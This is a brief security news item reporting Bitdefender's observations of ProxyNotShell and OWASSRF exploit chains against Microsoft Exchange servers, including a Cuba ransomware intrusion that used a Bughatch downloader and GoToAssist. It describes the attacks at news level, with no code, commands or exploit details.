ProxyNotShell exploit chains in the wild.
N2K logoJan 24, 2023

Microsoft Exchange servers are under attack.

ProxyNotShell exploit chains in the wild.

Bitdefender has observed an increase in attacks using ProxyNotShell and OWASSRF exploit chains to target Microsoft Exchange servers. 

Thousands of servers still vulnerable.

ProxyNotShell and OWASSRF are exploit chains that use CVE-2022-41080 and CVE-2022-41082 to launch server-side request forgery (SSRF) against Exchange servers. These exploits can allow an authenticated user to escalate access and carry out remote code execution.

BleepingComputer reported earlier this month that more than 60,000 Exchange servers are still vulnerable to these attacks.

Opportunistic attacks by ransomware gangs.

Bitdefender describes several recent attacks using these exploit chains, including one by the Cuba ransomware operation:

“In this case, threat actors used ProxyNotShell exploit chain to execute PowerShell commands. Initially, they tried to download the komar<xx>.dll, which we identified as Bughatch downloader. Bughatch is known to be used in Cuba ransomware operations, but our attribution is mostly based on many known IOCs and reused infrastructure. After download commands were blocked, they proceeded with the unattended (silent) installation of GoToAssist tool. GoToAssist is a legitimate remote support software from LogMeIn Inc.”

Bitdefender notes that most of these attacks targeted entities in the United States, along with companies in Poland, Austria, Kuwait, and Turkey.